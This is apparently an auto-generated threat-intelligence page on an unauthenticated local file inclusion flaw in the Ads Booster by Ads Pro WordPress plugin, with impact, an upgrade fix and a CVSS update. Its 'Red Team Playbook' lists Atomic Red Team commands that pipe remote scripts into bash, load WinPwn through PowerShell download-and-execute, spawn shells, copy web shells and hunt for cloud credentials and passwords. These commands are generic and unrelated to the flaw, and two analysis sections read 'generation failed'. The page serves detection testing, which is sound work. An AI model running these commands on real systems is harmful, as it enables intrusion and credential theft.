CVE-2024-52428
Overview
This vulnerability is a PHP Local File Inclusion (LFI) flaw arising from improper control over filename parameters used in include or require statements within the Peter Ads Booster by Ads Pro plugin. The root cause is insufficient validation or sanitization of user-supplied input that is directly passed to PHP file inclusion functions. The affected component is the file inclusion mechanism in versions up to and including 1.12 of the Ads Booster by Ads Pro WordPress plugin.
Vulnerability Description
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Peter Ads Booster by Ads Pro free-wp-booster-by-ads-pro allows PHP Local File Inclusion.This issue affects Ads Booster by Ads Pro: from n/a through <= 1.12.
Impact
An unauthenticated attacker can exploit this vulnerability to include arbitrary local files on the server, potentially disclosing sensitive information such as configuration files, credentials, or source code. This can facilitate further attacks including remote code execution if attacker-controlled files are accessible or combined with other vulnerabilities. No user interaction or authentication is required, increasing the risk of automated exploitation and data breach, which can lead to compromise of the hosting environment and lateral movement within the network.
Solution
Users should upgrade the Ads Booster by Ads Pro WordPress plugin to a version later than 1.12 where this vulnerability is addressed. Detailed patch instructions and version updates are available at Patchstack's advisory page: https://patchstack.com/database/Wordpress/Plugin/free-wp-booster-by-ads-pro/vulnerability/wordpress-ads-booster-by-ads-pro-plugin-1-12-local-file-inclusion-vulnerability?_s_id=cve. Applying the vendor's updated plugin version eliminates the unsafe file inclusion mechanism.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability in the Ads Booster plugin for WordPress arises from improper control of filenames within include or require statements in PHP scripts. This flaw allows for local file inclusion (LFI), which can lead to unauthorized access to sensitive files on the server. When a PHP application fails to properly validate or sanitize user input, attackers can manipulate the input to include arbitrary files from the server's filesystem. This could result in the exposure of configuration files, password files, or even the execution of malicious scripts, depending on the server's configuration and the permissions assigned to the web server user.
Attack vectors for exploiting this vulnerability are varied and can be executed with relative ease by an attacker. The most straightforward method involves crafting a request that alters the filename parameter to point to a sensitive file on the server. For instance, an attacker might use a URL that includes a path traversal sequence (e.g., ../../) to navigate the directory structure and access files outside the intended directory. Once the attacker successfully includes a sensitive file, they could extract valuable information such as database credentials or session tokens. Additionally, if the server is misconfigured to allow the execution of PHP code from included files, the attacker could potentially upload and execute their own malicious scripts, leading to further compromise.
The real-world impact of this vulnerability can be significant for businesses utilizing the affected plugin. Organizations that rely on the Ads Booster plugin may face severe consequences, including data breaches, unauthorized access to sensitive information, and potential loss of customer trust. The CVSS score of 8.1 indicates a high severity, suggesting that successful exploitation could lead to substantial damage. Furthermore, the implications extend beyond immediate data loss; businesses may also incur regulatory fines if they fail to protect personal data in compliance with laws such as GDPR or HIPAA. The reputational damage from a public breach can also have long-lasting effects on customer relationships and brand integrity.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regular security audits and code reviews can help identify and remediate improper input handling in PHP applications. Utilizing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious requests that attempt to exploit the LFI vulnerability. Additionally, keeping the Ads Booster plugin and all other components of the WordPress site up to date is crucial, as updates often include patches for known vulnerabilities. Educating developers about secure coding practices, particularly regarding input validation and sanitization, can significantly reduce the risk of similar vulnerabilities in the future.
In conclusion, the improper control of filenames in the Ads Booster plugin presents a serious security risk that can lead to local file inclusion vulnerabilities. The ease of exploitation and potential for significant impact on business operations underscore the importance of proactive security measures. By implementing robust detection and mitigation strategies, organizations can protect themselves from the risks associated with this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has updated the CVSS severity rating for CVE-2024-52428 from 8.1 to 9.8, reflecting a reassessment of the vulnerability’s potential impact and exploitability. This adjustment underscores the critical nature of the improper control of filenames in the Ads Booster by Ads Pro plugin, elevating it to near-maximum severity. While our telemetry continues to show stable exploit trends without new proof-of-concept exploits or significant shifts in attacker behavior, the heightened CVSS score signals an increased urgency for defenders to prioritize detection and mitigation efforts. The revised score indicates that successful exploitation could lead to severe consequences, including unauthorized local file inclusion that may compromise system integrity or enable further escalation. Although the Exploit Prediction Scoring System (EPSS) remains low and stable, the critical CVSS rating amplifies the risk profile, suggesting that threat actors may find this vulnerability increasingly attractive as a vector for intrusion. Defenders should interpret this change as a call to reassess their exposure and readiness, given the amplified potential impact despite the current absence of widespread exploitation.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Scripteo | Ads Booster By Ads Pro | All |
cpe:2.3:a:scripteo:ads_booster_by_ads_pro:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-193 | PHP Remote File Inclusion |
33%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-52428 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/free-wp-booster-by-ads-pro/vulnerability/wordpress-ads-booster-by-ads-pro-plugin-1-12-local-file-inclusion-vulnerability?_s_id=cve |